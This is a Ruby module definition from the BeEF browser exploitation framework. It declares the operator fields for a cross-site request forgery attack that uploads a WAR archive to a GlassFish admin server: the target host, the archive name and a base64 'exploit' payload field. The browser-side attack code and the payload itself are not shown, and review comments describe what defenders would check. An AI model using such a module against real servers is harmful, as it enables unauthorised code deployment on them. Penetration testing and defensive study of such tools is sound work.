#
# Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF command module definition: declares the operator-configurable fields
# for the module and stores the value it reports back.
#
# NOTE(review): the class name indicates a cross-site request forgery (XSRF)
# WAR upload against a GlassFish server; the browser-side code that issues the
# request is not in this file, so the exact request cannot be confirmed here.
# For defenders: an attack of this class presumably depends on the admin
# interface being reachable from a victim's browser and accepting
# state-changing requests without an anti-CSRF check - confirm against the
# deployed GlassFish configuration.
class Glassfish_war_upload_xsrf < BeEF::Core::Command
  # Describes the input fields rendered for this module.
  #
  # @return [Array<Hash>] one hash per field, in display order:
  #   restHost (target base URL), warName (uploaded file name) and
  #   warBase (base64-encoded archive content, per its UI label).
  def self.options
    # Base URL of the target; 4848 is presumably the GlassFish admin port.
    host_field = {
      'name' => 'restHost',
      'ui_label' => 'Host',
      'type' => 'textarea',
      'value' => 'http://glassfishserver:4848',
      'width' => '400px',
      'height' => '25px'
    }

    # File name given to the uploaded archive.
    filename_field = {
      'name' => 'warName',
      'ui_label' => 'Filename',
      'value' => 'hello.war',
      'type' => 'textarea',
      'width' => '400px',
      'height' => '25px'
    }

    # Archive body supplied as text; the label states it is base64.
    payload_field = {
      'name' => 'warBase',
      'ui_label' => 'Base64 of exploit',
      'value' => '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',
      'type' => 'textarea',
      'width' => '400px',
      'height' => '800px'
    }

    [host_field, filename_field, payload_field]
  end

  # Persists the 'result' entry of the datastore under the 'result' key.
  #
  # NOTE(review): the value presumably originates from the hooked browser, so
  # it should be treated as untrusted wherever it is later displayed - confirm
  # against the framework's result rendering.
  def post_execute
    save({ 'result' => @datastore['result'] })
  end
end
